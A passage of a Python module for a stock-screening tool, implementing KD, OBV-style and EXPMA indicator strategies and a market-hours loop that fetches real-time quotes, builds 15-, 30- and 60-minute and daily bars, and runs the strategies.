ret_v, self.__k_v = self.__xma.executeaction(minlength=self.__rsv_period,
fnf=self.__rsv,
weight=1/self.__k_period,
intvalue=50,
reason='KD_k',
operationtype='SMA')
if ret_v:
ret_v, self.__d_v = self.__xma.executeaction(minlength=self.__rsv_period,
fnf=self.__kvalue,
weight=1/self.__d_period,
intvalue=50,
reason='KD_d',
operationtype='SMA')
return ret_v, self.__k_v, self.__d_v
class StrategyBasedOnKDAction(ActionBase):
def __init__(self, data: pd.DataFrame):
super().__init__(data)
def crossupaction(self, time_stamp, k_v, d_v, c_v):
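        # golden cross: K below D on the previous bar and above it on the
        # current one; when c_v = (True, threshold), the cross must not happen
        # with both lines already above the threshold on both bars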
index_c = self.getindex(time_stamp)
if index_c is None:
return False
index_p = index_c - 1
length = len(self._data.index)
if index_c >= length or index_c < 0 or index_p >= length or index_p < 0:
return False
k_c_v = k_v[index_c]
d_c_v = d_v[index_c]
k_p_v = k_v[index_p]
d_p_v = d_v[index_p]
if k_p_v < d_p_v and k_c_v > d_c_v:
if c_v[0]:
if not (k_c_v > c_v[1] and k_p_v > c_v[1]) and not (d_c_v > c_v[1] and d_p_v > c_v[1]):
return True
else:
return True
return False
def entangleaction(self, time_stamp, periods, k_v, d_v, c_v):
def comparevalue():
if len(kd_results) < periods:
return False
ret = True
for ii in range(periods):
k_v_ii = kd_results[ii][0]
d_v_ii = kd_results[ii][1]
ret &= self.__compare_entanglement(k_v_ii, d_v_ii, 10)
if not ret:
break
return ret
kd_results = []
index_c = self.getindex(time_stamp)
if index_c is None:
return False
for i in range(periods):
index_t = index_c - i
if index_t < 0:
break
k_v_i = k_v[index_t]
d_v_i = d_v[index_t]
if k_v_i is not None and d_v_i is not None:
if c_v[0]:
if k_v_i <= c_v[1] and d_v_i <= c_v[1]:
kd_results.append((k_v_i, d_v_i))
else:
break
else:
kd_results.append((k_v_i, d_v_i))
else:
break
return comparevalue()
def crossup_entangle_action(self, time_stamp, periods, k_v, d_v, c_v):
if self.crossupaction(time_stamp, k_v, d_v, (False, 0)):
index_c = self.getindex(time_stamp)
if index_c is None:
return False
k_v_c = k_v[index_c]
d_v_c = d_v[index_c]
if self.__compare_entanglement(k_v_c, d_v_c, 10):
return self.entangleaction(time_stamp, periods, k_v, d_v, c_v)
else:
index_p = index_c - 1
if index_p < periods - 1:
return False
time_stamp_p = self._data.index[index_p]
return self.entangleaction(time_stamp_p, periods, k_v, d_v, c_v)
return False
def crossup_entangle_period_action(self, time_stamp, periods, duration, k_v, d_v):
if self.crossupaction(time_stamp, k_v, d_v, (False, 0)):
if self.crossup_entangle_action(time_stamp, periods, k_v, d_v, (False, 0)):
return True
index_c = self.getindex(time_stamp)
if index_c is None:
return False
index_s = index_c - 2
if index_s < periods:
return False
count = 1
index_i = index_s - 1
while index_i > -1:
if count > duration - 2:
break
time_stamp_i = self._data.index[index_i]
#TODO: try crossup_entangle_action out
if self.crossupaction(time_stamp_i, k_v, d_v, (False, 0)):
break
if self.entangleaction(time_stamp_i, periods, k_v, d_v, (False, 0)):
return True
index_i -= 1
count += 1
return False
def entangle_period_action(self, time_stamp, periods, duration, k_v, d_v):
index_c = self.getindex(time_stamp)
if index_c is None:
return False
index_s = index_c - 2
if index_s < periods:
return False
count = 1
index_i = index_s - 1
while index_i > -1:
if count > duration - 2:
break
time_stamp_i = self._data.index[index_i]
if self.entangleaction(time_stamp_i, periods, k_v, d_v, (False, 0)):
return True
index_i -= 1
count += 1
return False
def deviate_price_k_action(self, time_stamp, duration, k_values):
index_c = self.getindex(time_stamp)
if index_c is None:
return False
length = min(index_c + 1, duration)
count = 1
while count < length:
index = index_c - count
if self.close_ticker(index_c) < self.close_ticker(index) and \
k_values[index_c] > k_values[index]:
return True
count += 1
return False
def deviate_price_k_s_action(self, time_stamp, duration, k_values, d_values):
def GeneralLine(x1, y1, x2, y2):
# general formula: Ax+By+C=0
A = y2 - y1
B = x1 - x2
C = x2 * y1 - x1 * y2
return A, B, C
def cal_Intersection_Lines(line1, line2):
A1, B1, C1 = GeneralLine(*line1)
A2, B2, C2 = GeneralLine(*line2)
D = A1 * B2 - A2 * B1
if D == 0:
return None
else:
x = (B1 * C2 - B2 * C1) / D
y = (A2 * C1 - A1 * C2) / D
return x, y
index_c = self.getindex(time_stamp)
if index_c is None:
return False
if self.close_ticker(index_c) == 0 and self.open_ticker(index_c) == 0:
return False
tmp_time = datetime.time(hour=time_stamp.hour, minute=time_stamp.minute)
k_v = k_values
d_v = d_values
l_v = self._data.low.values
if DataContext.iscountryChina():
if tmp_time == datetime.time(hour=10, minute=30):
k_v = REF(k_v, 1)
d_v = REF(d_v, 1)
l_v = REF(l_v, 1)
elif tmp_time == datetime.time(hour=11, minute=30):
k_v = REF(k_v, 2)
d_v = REF(d_v, 2)
l_v = REF(l_v, 2)
elif tmp_time == datetime.time(hour=14):
k_v = REF(k_v, 3)
d_v = REF(d_v, 3)
l_v = REF(l_v, 3)
elif tmp_time == datetime.time(hour=15):
k_v = REF(k_v, 4)
d_v = REF(d_v, 4)
l_v = REF(l_v, 4)
else:
return False
else:
return False
try:
min_low_duration_v = LLV(l_v, duration)
except BaseException as be:
logger.error("LLV is failed", be)
return False
cross_v = CROSS(k_v, d_v)
if len(k_v) < duration or len(d_v) < duration:
return False
count = -1
while count > - duration:
if not cross_v[count - 1] and cross_v[count]:
break
count -= 1
else:
return False
cross_point = cal_Intersection_Lines([0, d_v[count - 1], 1, d_v[count]],
[0, k_v[count - 1], 1, k_v[count]])
if (min_low_duration_v[-1] - self.close_ticker(index_c)) > min_low_duration_v[-1] * 1 / 100 and \
(k_values[index_c] - cross_point[1]) > cross_point[1] * 5 / 100:
return True
return False
def __compare_entanglement(self, k_v_t, d_v_t, diff_v):
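        # K and D count as "entangled" while they stay within diff_v points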
return abs(k_v_t - d_v_t) <= diff_v
def executeaction(self, **kwargs):
def locdata():
row = self._data.loc[time_stamp]
ret_value.loc[len(ret_value)] = [row['gid'], row['open'], row['close'],
row['high'], row['low'], row['volume'],
time_stamp, True]
occurrences = kwargs['occurrence_time']
operation = kwargs['operation']
c_v = kwargs.get('crossvalue', (False, 0))
periods = kwargs.get('periods', 1)
duration = kwargs.get('duration', 40)
rsv_p = kwargs.get('rsv_period', 9)
k_p = kwargs.get('k_period', 3)
d_p = kwargs.get('d_period', 3)
k_v_o = kwargs.get('KValues', None)
d_v_o = kwargs.get('DValues', None)
ret_valid = True
ret_value = pd.DataFrame(columns=columns)
if k_v_o is not None and d_v_o is not None:
valid = True
k_v = k_v_o
d_v = d_v_o
else:
# FIXME
# kd_indicator = KDAction(self._data, rsv_p, k_p, d_p)
# valid, k_v, d_v = kd_indicator.executeaction()
try:
k_v, d_v, j_v = KDJ(self._data.close.values, self._data.high.values, self._data.low.values)
valid = True
except BaseException as be:
logger.error("The KDJ is failed", be)
valid = False
if valid:
for time_stamp in occurrences:
if operation == 'cross_up':
if self.crossupaction(time_stamp, k_v, d_v, c_v):
locdata()
elif operation == 'entangle':
if self.entangleaction(time_stamp, periods, k_v, d_v, c_v):
locdata()
elif operation == 'entangle_and_cross_up':
if self.crossup_entangle_action(time_stamp, periods, k_v, d_v, c_v):
locdata()
elif operation == 'entangle_and_cross_up_within_period':
if self.crossup_entangle_period_action(time_stamp, periods, duration, k_v, d_v):
locdata()
elif operation == 'entangle_within_period':
if self.entangle_period_action(time_stamp, periods, duration, k_v, d_v):
locdata()
elif operation == 'divergence_price_lower_and_k_higher':
if self.deviate_price_k_action(time_stamp, duration, k_v):
locdata()
elif operation == 'divergence_price_lower_and_k_higher_simple':
if self.deviate_price_k_s_action(time_stamp, duration, k_v, d_v):
locdata()
else:
logger.error("%s is not supported!" % operation)
else:
ret_valid = False
return ret_valid, ret_value
class OBVAction(ActionBase):
def __init__(self, data: pd.DataFrame, obv_period: int):
super().__init__(data)
self.__obv_p = obv_period
def executeaction(self, **kwargs):
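        # sums volume weighted by the close-location value
        # ((C - L) - (H - C)) / (H - L) over the last obv_period bars; this is
        # an accumulation/distribution style measure rather than classic OBV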
index = kwargs['index']
total_value = 0
ret_valid = False
if index - (self.__obv_p - 1) < 0:
return ret_valid, total_value
for i in range(self.__obv_p):
index_internal = index - i
price_dist = self.high_ticker(index_internal) - self.low_ticker(index_internal)
if price_dist != 0:
total_value += self.volume_ticker(index_internal) * \
((self.close_ticker(index_internal)-self.low_ticker(index_internal))-
(self.high_ticker(index_internal)-self.close_ticker(index_internal)))/price_dist
else:
ret_valid = True
return ret_valid, total_value
class OBVUpACTION(ActionBase):
def __init__(self, data: pd.DataFrame):
super().__init__(data)
def __calcv_a_obv(self, index: int, period_a: int, period: int):
ret_valid = False
total_value = 0
obv_indicator = OBVAction(self._data, period)
if index - (period_a - 1) - (period - 1) < 0:
return ret_valid, total_value
for i in range(period_a):
index_interal = index - i
valid, obv_v = obv_indicator.executeaction(index=index_interal)
if not valid:
break
total_value += obv_v
else:
total_value = total_value / period_a
ret_valid = True
return ret_valid, total_value
def executeaction(self, **kwargs):
occurrences = kwargs['occurrence_time']
obv_p = kwargs['obv_period']
obv_a_p = kwargs['obv_a_period']
ret_valid = False
ret_value = pd.DataFrame(columns=columns)
obv_indicator = OBVAction(self._data, obv_p)
oa = occurrences.array
for time_stamp_original in oa:
cur_index = self.getindex(time_stamp_original)
if cur_index is None:
continue
valid1, obv_v = obv_indicator.executeaction(index=cur_index)
if valid1:
valid2, obv_a_v = self.__calcv_a_obv(cur_index, obv_a_p, obv_p)
if valid2:
ret_valid = True
if obv_v > 0 and obv_v > obv_a_v:
row = self._data.loc[time_stamp_original]
ret_value.loc[len(ret_value)] = [row['gid'], row['open'], row['close'],
row['high'], row['low'], row['volume'],
time_stamp_original, True]
return ret_valid, ret_value
class StrategyBasedOnDayKAction(ActionBase):
def __init__(self, data: pd.DataFrame):
super().__init__(data)
self.__min_length = 1
def __getCloseTicker(self, index):
valid = False
ret = None
if index < self.__min_length - 1:
logger.error("index is invalid in data for EXPEMA", index)
else:
ret = self.close_ticker(index)
if ret is not None:
valid = True
return valid, ret
def __calcamplitudeavg(self, period: int, percent: float):
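        # average amplitude (high - low) / previous close over the `period`
        # bars preceding the latest bar; true when the mean reaches percent/100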
ret_valid_t = False
ret_value_t = False
requiredlength = period + 2
if len(self._data) < requiredlength:
return ret_valid_t, ret_value_t
ret_valid_t = True
total: float = 0
for i in range(1, requiredlength-1):
index: int = -1 - i
total += (self.high_ticker(index)-self.low_ticker(index))/self.close_ticker(index-1)
if total/period >= percent/100:
ret_value_t = True
return ret_valid_t, ret_value_t
def __calc_price_kavg(self, k_period, isgreater):
ret_valid_t = False
ret_value_t = False
if len(self._data.index) >= k_period:
start_index = end_index = -1
maaction = MAAction(start_index, end_index, k_period, self._data)
valid_ma, result_ma = maaction.executeaction(fn_ticker=self.close_ticker)
if valid_ma:
ret_valid_t = True
if start_index in result_ma:
tmp_ret = self.close_ticker(start_index) >= result_ma[start_index]
ret_value_t = not (isgreater ^ tmp_ret)
return ret_valid_t, ret_value_t
def __calckavg(self, k_period, calc_period, isgreater):
ret_valid_t = False
ret_value_t = True
start_index = -1
end_index = 0 - calc_period
if len(self._data.index) >= k_period + calc_period - 1:
maaction = MAAction(start_index, end_index, k_period, self._data)
valid_ma, result_ma = maaction.executeaction(fn_ticker=self.close_ticker)
if valid_ma:
ret_valid_t = True
if isgreater:
for index, avg_v in result_ma.items():
if self.close_ticker(index) <= avg_v:
ret_value_t = False
break
if isgreater and not ret_value_t:
return ret_valid_t, ret_value_t
count = 0
cursor = start_index
while count < calc_period - 1:
cursor_p = cursor - 1
if cursor in result_ma and cursor_p in result_ma:
if result_ma[cursor] <= result_ma[cursor_p]:
ret_value_t = False
break
else:
ret_value_t = False
break
count += 1
cursor -= 1
return ret_valid_t, ret_value_t
def __calcemadif(self, dif_period, calc_period):
ret_valid_t = False
ret_value_t = True
start_index = -1
ema = XMAAction(self._data)
ret_v, ema_dif_v = ema.executeaction(minlength=1,
fnf=self.__getCloseTicker,
weight=2 / (dif_period + 1),
intvalue=0,
reason='EXPMA_dif',
operationtype='EMA')
if ret_v:
ret_valid_t = True
count = 0
cursor = start_index
while count < calc_period - 1:
cursor_p = cursor - 1
if ema_dif_v[cursor] is not None and ema_dif_v[cursor_p] is not None:
if ema_dif_v[cursor] <= ema_dif_v[cursor_p]:
ret_value_t = False
break
else:
ret_value_t = False
break
count += 1
cursor -= 1
return ret_valid_t, ret_value_t
def executeaction(self, **kwargs):
operation = kwargs['operation']
        amplitude_period = kwargs.get('amplitude_peroid', 5)  # the misspelled key is kept so existing callers keep working
amplitude_percent = kwargs.get('amplitude_percent', 3)
avgk_k_period = kwargs.get('avgk_period', 20)
avgk_calc_period = kwargs.get('avgk_calc_period', 2)
avgk_greater = kwargs.get('avgk_greater', False)
avg_ema_dif_period = kwargs.get('avg_ema_dif_period', 12)
        avg_ema_avg_period = kwargs.get('avg_ema_avg_period', 50)
ret_valid = False
ret_value_bool = False
ret_value = pd.DataFrame(columns=columns)
if operation == 'amplitude_avg':
ret_valid, ret_value_bool = self.__calcamplitudeavg(amplitude_period, amplitude_percent)
elif operation == 'avg_k_go':
ret_valid, ret_value_bool = self.__calckavg(avgk_k_period, avgk_calc_period, avgk_greater)
elif operation == 'price_k_avg':
ret_valid, ret_value_bool = self.__calc_price_kavg(avgk_k_period, avgk_greater)
elif operation == 'expma_dif_go':
ret_valid, ret_value_bool = self.__calcemadif(avg_ema_dif_period, avgk_calc_period)
else:
logger.error("%s is not supported!" % operation)
if ret_valid and ret_value_bool:
time_stamp = self._data.index[-1]
row = self._data.loc[time_stamp]
ret_value.loc[len(ret_value)] = [row['gid'], row['open'], row['close'],
row['high'], row['low'], row['volume'],
time_stamp, True]
return ret_valid, ret_value
class EXPMACrossAction(ActionBase):
def __init__(self, data: pd.DataFrame):
super().__init__(data)
def executeaction(self, **kwargs):
ret_valid = True
ret_value = pd.DataFrame(columns=columns)
if len(self._data.close) < 2:
ret_valid = False
return ret_valid, ret_value
try:
expma_12, expma_50 = EXPMA(self._data.close.values)
tmp_ret = CROSS(expma_12, expma_50)
if tmp_ret[-2] == 0 and tmp_ret[-1] == 1:
time_stamp = self._data.index[-1]
row = self._data.loc[time_stamp]
ret_value.loc[len(ret_value)] = [row['gid'], row['open'], row['close'],
row['high'], row['low'], row['volume'],
time_stamp, True]
except BaseException as be:
logger.error("The EXPMA is failed", be)
ret_valid = False
return ret_valid, ret_value
class StockData:
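    """Container mapping a stock symbol to its bar DataFrame for one sector."""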
def __init__(self, sector: str = ''):
self.sector = sector
self.__data = {}
def update(self, symbol: str, data: pd.DataFrame):
self.__data.update({str(symbol): data})
def get(self, symbol: str) -> pd.DataFrame:
try:
ret = self.__data[str(symbol)]
except Exception as ee:
logger.error("error >>>", ee)
traceback.print_exc()
ret = pd.DataFrame(columns=columns)
return ret
def has_symbol(self, symbol: str) -> bool:
        return symbol in self.__data
def keys(self):
return self.__data.keys()
def clear(self):
self.__data.clear()
    def remove(self, symbol: str) -> None:
try:
if symbol in self.__data:
del self.__data[symbol]
except Exception as ee:
logger.error("error >>>", ee)
traceback.print_exc()
def loadsectors(context: DataContext):
if not DataContext.iscountryChina():
return
filename = "sectors_allocation"
filepath = os.path.join(r'./', filename)
append_value(context.sectors, '000001', [str(code).zfill(6) for code in DataContext.code_spotlighted])
with open(filepath, 'r') as file:
for line in file.read().splitlines():
sector_symbols = line.split(":")
if len(sector_symbols) > 1:
symbols = sector_symbols[1].split(",")
if len(symbols) > 1:
for symbol in symbols:
append_value(context.sectors, sector_symbols[0], symbol)
def loadsectorsfromEM():
date_t = datetime.datetime.today().replace(hour=0, minute=0, second=0, microsecond=0).strftime("%Y-%m-%d")
if DataContext.iscountryChina():
sectors = sectors_CN.keys()
elif DataContext.iscountryUS():
sectors = sectors_US.keys()
filename = "sectors_allocation"
filepath = os.path.join(r'./', filename)
with open(filepath, 'w+') as file:
for sector_i in sectors:
if sector_i == '000001':
pass
else:
data = c.sector(sector_i, date_t)
if data.ErrorCode != 0:
logger.debug("request sector %s Error, %s" % (sector_i, data.ErrorMsg))
else:
file.write('{}:'.format(sector_i))
symbolsinsector = []
for code in data.Data:
code_l = code.split(".")
if len(code_l) > 1:
symbolsinsector.append(code_l[0])
file.writelines(",".join(symbolsinsector))
file.write('\r\n')
fetchdatacounter = 0
barcounter_15 = 0
roundresult_15 = 0
firstroundresult_15 = 0
barcounter_30 = 0
roundresult_30 = 0
firstroundresult_30 = 0
barcounter_60 = 0
roundresult_60 = 0
firstroundresult_60 = 0
fetch_count = 1
def snapshot(context: DataContext):
# 1) rank sectors over previous consecutive 10 business days
# 2) start fetching data once market is open
    # 3) take a snapshot of stocks (depending on country) every 3 seconds, subject to rate limits
# 4) update stock data in context
# 5) calculate indicators based on newly fetched stock data
# 6) send result to another thread to handle
global fetchdatacounter, fetch_count
global barcounter_15, roundresult_15, firstroundresult_15
global barcounter_30, roundresult_30, firstroundresult_30
global barcounter_60, roundresult_60, firstroundresult_60
current_time = datetime.datetime.now()
current_date = datetime.date.today()
if DataContext.iscountryChina():
opentime = datetime.datetime.combine(current_date, context.marketopentime)
closetime = datetime.datetime.combine(current_date, context.marketclosetime)
breakstarttime = datetime.datetime.combine(current_date, context.marketbreakstarttime)
breakstoptime = datetime.datetime.combine(current_date, context.marketbreakstoptime)
elif DataContext.iscountryUS():
opentime = datetime.datetime.combine(current_date, context.marketopentime)
closetime = datetime.datetime.combine(current_date, context.marketclosetime)
target_time = datetime.timedelta(days=0, hours=0, minutes=0, seconds=0)
symbols_exchange = []
for sector in context.markets:
symbols_exchange += context.symbols_exchange[stock_group[sector]]
symbols_original_len = len(symbols_exchange)
symbols_tmp = set(symbols_exchange)
symbols_tmp.difference_update(DataContext.invalid_stock_codes)
symbols_exchange = list(symbols_tmp)
def update_stock_data_in_context(timeout=0):
global fetchdatacounter, fetch_count
global barcounter_15, roundresult_15, firstroundresult_15
global barcounter_30, roundresult_30, firstroundresult_30
global barcounter_60, roundresult_60, firstroundresult_60
        # 1) fetch data
logger.debug("totally scan %d stocks but the number of original stock codes is %d" %
(len(symbols_exchange), symbols_original_len))
'''
EM has been obsoleted.
stock_data = csqsnapshot_t(symbols_exchange, "NOW,VOLUME,OPEN,HIGH,LOW", "Ispandas=1")
if not isinstance(stock_data, c.EmQuantData):
'''
logger.debug("Start to fetch stock data count: {}".format(fetch_count))
starttime = time.perf_counter()
stock_data = None
try:
# FIXME: only for datasource AKShare
# stock_data = ak.stock_zh_a_spot()
# need to set applied_data_source
applied_data_source = DataSource.EFINANCE
stock_data = ef.stock.get_realtime_quotes()
stock_data.columns = [
'CODE',
'_',
'_',
'NOW',
'HIGH',
'LOW',
'OPEN',
'_',
'_',
'_',
'_',
'VOLUME',
'_',
'_',
'_',
'_',
'_',
'_'
]
stock_data = stock_data[[
'CODE',
'NOW',
'HIGH',
'LOW',
'OPEN',
'VOLUME'
]]
stock_data = stock_data.astype({
'NOW': "float",
'HIGH': "float",
'LOW': "float",
'OPEN': "float",
'VOLUME': "float"
})
except Exception:
logger.exception("Failed to fetch stock data, count: {}".format(fetch_count))
endtime = time.perf_counter()
logger.debug("time consumption of count {} is {}s".format(fetch_count, endtime - starttime))
fetch_count += 1
if stock_data is None or not isinstance(stock_data, pd.DataFrame):
# FIXME: only for datasource AKShare
# logger.debug("request ak.stock_zh_a_spot Error at {} ".format(current_time))
logger.debug("request ef.stock.get_realtime_quotes Error at {} ".format(current_time))
time.sleep(timeout)
return False
else:
# 2) update stock data in context
logger.debug("request real quote with success at {} ".format(current_time))
fetchdatacounter += 1
logger.debug("fetchdatacounter is %d" % fetchdatacounter)
deltatime = current_time - opentime
roundresult_15 = deltatime.seconds // (15 * 60)
roundresult_30 = deltatime.seconds // (30 * 60)
if DataContext.iscountryChina():
if (current_time - opentime) >= target_time and (breakstarttime - current_time) >= target_time:
roundresult_60 = deltatime.seconds // (60 * 60)
else:
tmp_round = (current_time - breakstoptime).seconds // (60 * 60)
if tmp_round == 0:
roundresult_60 = 3
else:
roundresult_60 = tmp_round + 3
elif DataContext.iscountryUS():
if target_time <= (closetime - current_time) <= datetime.timedelta(days=0, hours=0, minutes=30,
seconds=0):
roundresult_60 = 7
else:
roundresult_60 = deltatime.seconds // (60 * 60)
time_windows_15[roundresult_15] += 1
time_windows_30[roundresult_30] += 1
time_windows_60[roundresult_60] += 1
if fetchdatacounter == 1:
firstroundresult_15 = roundresult_15
firstroundresult_30 = roundresult_30
firstroundresult_60 = roundresult_60
if time_windows_60[roundresult_60] == 1:
barcounter_60 += 1
logger.debug("The value of roundresult_60 is %d" % roundresult_60)
logger.debug("The number of 60 mins bar is %d" % barcounter_60)
if time_windows_30[roundresult_30] == 1:
barcounter_30 += 1
logger.debug("The value of roundresult_30 is %d" % roundresult_30)
logger.debug("The number of 30 mins bar is %d" % barcounter_30)
if time_windows_15[roundresult_15] == 1:
barcounter_15 += 1
logger.debug("The value of roundresult_15 is %d" % roundresult_15)
logger.debug("The number of 15 mins bar is %d" % barcounter_15)
# first tick of a new 15-minute window: create the new rows and set the open value
updatestockdata(stock_data, True, applied_data_source)
else:
updatestockdata(stock_data, datasource=applied_data_source)
logger.debug("update stock data in context")
return True
def updatestockdata(stockdata: pd.DataFrame, isnewrow: bool = False, datasource = DataSource.EFINANCE):
def getrecordtime(period: int):
if (current_time - closetime) >= target_time or (opentime - current_time) >= target_time:
return datetime.datetime.combine(current_date, datetime.time(hour=15))
if period == 15 or period == 30:
slot = current_time.minute // period + 1
if slot == 60 // period:
recordtime = datetime.datetime.combine(current_date, datetime.time(hour=current_time.hour + 1))
else:
recordtime = datetime.datetime.combine(current_date, datetime.time(hour=current_time.hour, minute=slot * period))
elif period == 60:
if DataContext.iscountryChina():
if (current_time - opentime) >= target_time and (breakstarttime - current_time) >= target_time:
slot = (current_time - opentime).seconds // (period * 60) + 1
recordtime = datetime.datetime.combine(current_date, datetime.time(hour=opentime.hour + slot, minute=opentime.minute))
else:
slot = (current_time - breakstoptime).seconds // (period * 60) + 1
recordtime = datetime.datetime.combine(current_date, datetime.time(hour=breakstoptime.hour + slot))
elif DataContext.iscountryUS():
if target_time <= (closetime - current_time) <= datetime.timedelta(days=0, hours=0, minutes=30,
seconds=0):
recordtime = datetime.datetime.combine(current_date, datetime.time(hour=closetime.hour))
else:
slot = (current_time - opentime).seconds // (period * 60) + 1
recordtime = datetime.datetime.combine(current_date, datetime.time(hour=opentime.hour + slot, minute=opentime.minute))
return recordtime
def sumvolume(size_p: int, start: int, dataset: pd.DataFrame):
sum_volume = 0
try:
for j in range(size_p):
if start < 0:
sum_volume += dataset.iloc[start - j]['volume']
else:
sum_volume += dataset.iloc[start + j]['volume']
except Exception as exce:
# traceback.print_exc()
logger.error("Symbol error occurred with {} error message is {}".format(dataset.iloc[-1]['gid'], exce))
return sum_volume
def updateexistingrow(firstk: bool, barcounter: int, dataset: pd.DataFrame, isdayk: bool=False):
if isdayk:
dataset.loc[dataset.index[-1]] = [symbol_idx, row['OPEN'], row['NOW'], row['HIGH'], row['LOW'], row['VOLUME']]
return
if firstk:
volume_cur_i = row['VOLUME']
else:
sum_v_i = sumvolume(barcounter - 1, -2, dataset)
volume_cur_i = row['VOLUME'] - sum_v_i
open_tmp = dataset.iloc[-1]['open']
cur_high = dataset.iloc[-1]['high']
cur_low = dataset.iloc[-1]['low']
if row['NOW'] > cur_high:
cur_high = row['NOW']
if row['NOW'] < cur_low:
cur_low = row['NOW']
dataset.loc[dataset.index[-1]] = [symbol_idx, open_tmp, row['NOW'], cur_high, cur_low, volume_cur_i]
isfirstK_240 = (fetchdatacounter == 1)
isfirstK_60 = (firstroundresult_60 == roundresult_60)
isfirstK_30 = (firstroundresult_30 == roundresult_30)
isfirstk_15 = (firstroundresult_15 == roundresult_15)
round_number_15 = sum(1 for tmp_number in time_windows_15 if tmp_number > 0)
round_number_30 = sum(1 for tmp_number in time_windows_30 if tmp_number > 0)
round_number_60 = sum(1 for tmp_number in time_windows_60 if tmp_number > 0)
for index in stockdata.index.array:
for sector_usd in context.markets:
# EM has been obsoleted.
# index_s = str(index)
index_s = stockdata['CODE'][index]
# only for Chinese stock
if datasource == DataSource.EFINANCE:
tmp_index_list = [index_s, exchanges[sector_usd]]
else:
tmp_index_list = [index_s[2:], index_s[0:2]]
index_s = ".".join(tmp_index_list)
sector_code = stock_group[sector_usd]
if index_s in context.symbols_exchange[sector_code]:
try:
if DataContext.iscountryChina():
symbol_idx = index_s[:-3]
elif DataContext.iscountryUS():
symbol_idx = index_s[:-2]
tmpdata = context.data15mins[sector_code].get(symbol_idx)
tmpdata_30 = context.data30mins[sector_code].get(symbol_idx)
tmpdata_60 = context.data60mins[sector_code].get(symbol_idx)
tmpdata_240 = context.data240mins[sector_code].get(symbol_idx)
row = stockdata.loc[index]
# create a new row for the 15-minute period; it represents the next period (we are at
# its beginning), so the next record time must be used as the index
if isnewrow:
record_time = getrecordtime(15)
if isfirstk_15:
volume_cur = row['VOLUME']
else:
sum_v = sumvolume(barcounter_15 - 1, -1, tmpdata)
volume_cur = row['VOLUME'] - sum_v
tmpdata.loc[pd.Timestamp(record_time)] = [symbol_idx, row['NOW'], row['NOW'], row['NOW'],
row['NOW'], volume_cur]
record_time = getrecordtime(30)
if isfirstK_30:
tmpdata_30.loc[pd.Timestamp(record_time)] = [symbol_idx, row['NOW'], row['NOW'],
row['NOW'], row['NOW'], row['VOLUME']]
else:
if (roundresult_15 % 2) == 0:
sum_v = sumvolume(barcounter_30 - 1, -1, tmpdata_30)
volume_cur = row['VOLUME'] - sum_v
tmpdata_30.loc[pd.Timestamp(record_time)] = [symbol_idx, row['NOW'], row['NOW'],
row['NOW'], row['NOW'], volume_cur]
else:
updateexistingrow(isfirstK_30, barcounter_30, tmpdata_30)
record_time = getrecordtime(60)
if isfirstK_60:
tmpdata_60.loc[pd.Timestamp(record_time)] = [symbol_idx, row['NOW'], row['NOW'],
row['NOW'], row['NOW'], row['VOLUME']]
else:
if (roundresult_15 % 4) == 0:
sum_v = sumvolume(barcounter_60 - 1, -1, tmpdata_60)
volume_cur = row['VOLUME'] - sum_v
tmpdata_60.loc[pd.Timestamp(record_time)] = [symbol_idx, row['NOW'], row['NOW'],
row['NOW'], row['NOW'], volume_cur]
else:
updateexistingrow(isfirstK_60, barcounter_60, tmpdata_60)
if isfirstK_240:
tmpdata_240.loc[pd.Timestamp(current_date)] = [symbol_idx, row['OPEN'], row['NOW'],
row['HIGH'],
row['LOW'], row['VOLUME']]
else:
updateexistingrow(isfirstK_240, -1, tmpdata_240, True)
else:
updateexistingrow(isfirstk_15, barcounter_15, tmpdata)
updateexistingrow(isfirstK_30, barcounter_30, tmpdata_30)
updateexistingrow(isfirstK_60, barcounter_60, tmpdata_60)
updateexistingrow(isfirstK_240, -1, tmpdata_240, True)
except BaseException as be:
logger.debug("It is failed to update context data, symbol is {}".format(symbol_idx))
logger.error("It is failed to update context data", be)
break
# FIXME because EM has been obsoleted.
# calcrankofchange()
while True:
current_time = datetime.datetime.now()
if DataContext.iscountryChina():
timecondition = (((current_time - opentime) >= target_time and (breakstarttime - current_time) >= target_time)
or ((current_time - breakstoptime) >= target_time and (closetime - current_time) >= target_time))
elif DataContext.iscountryUS():
timecondition = (((current_time - opentime) >= target_time) and ((closetime - current_time) >= target_time))
if timecondition:
if update_stock_data_in_context():
# 3) calculate indicators
logger.debug("run 9 strategies")
try:
result = {current_time: quantstrategies(context)}
except Exception as ee:
logger.error("It is failed to execute quantitative strategies. error >>>", ee)
traceback.print_exc()
result = {}
else:
logger.info("execute quantitative strategies successfully.")
context.queue.put(result)
logger.debug("send result to another thread to handle and sleep")
logger.debug("start to sleep with 720 seconds")
# TODO: replace sleep() with threading.Timer()
time.sleep(720)
logger.debug("sleep is done with 720 seconds")
# if closetime - current_time > datetime.timedelta(minutes=5):
# else:
# logger.debug("start to sleep with 45 seconds")
# time.sleep(45)
# logger.debug("sleep is done with 45 seconds")
'''
EM has been obsoleted.
elif stock_data.ErrorCode != 0:
logger.debug("Request csqsnapshot Error error code is {}; error message is {}; codes is {}".
format(stock_data.ErrorCode, stock_data.ErrorMsg, stock_data.Codes))
if stock_data.ErrorCode == 10002008 or stock_data.ErrorMsg.find('timeout') != -1:
logger.debug("timeout occurred so sleep 180 seconds and then logout")
logout_em()
time.sleep(180)
logger.debug("login again after sleeping 180")
login_em()
time.sleep(30)
logger.debug("sleep of 30 is done due to error occurring during requesting csqsnapshot")
'''
elif (current_time - closetime) >= target_time:
# FIXME: Only for datasource AKShare
# if not update_stock_data_in_context():
# update_stock_data_in_context(1200)
summarytotalresult(context)
logger.debug("market is closed so that snapshot quits")
context.queue.put(ProcessStatus.STOP)
print("time windows for 15 mins:")
print(time_windows_15)
print("time windows for 30 mins:")
print(time_windows_30)
print("time windows for 60 mins:")
print(time_windows_60)
print("total number of fetching data is %d" % fetchdatacounter)
break
else:
logger.debug("market is not open or break is ongoing so that await. Now is {}".format(current_time))
time.sleep(10)
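# Bar-slot arithmetic used by snapshot() above, in isolation: a quote's
# timestamp maps to a zero-based bar index by integer-dividing the time
# elapsed since the open; the 60-minute path additionally compensates for
# the Chinese lunch break. Illustrative sketch, not called anywhere:
def _example_bar_slot(now, market_open, period_minutes):
    # e.g. 35 minutes after the open with period_minutes=15 -> slot 2
    return (now - market_open).seconds // (period_minutes * 60)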
lock_qm = threading.Lock()
queue_history_data = Queue()
failed_to_get_data_symbols = []
# TODO: refactor the code below with a command-chain pattern
@time_measure
def quantstrategies(context: DataContext):
global lock_qm
totalresultdata = {}
transientresult100 = context.totalresult[DataContext.strategy100]
for sector_usd in context.markets:
resultdata = {}
sector_tmp = stock_group[sector_usd]
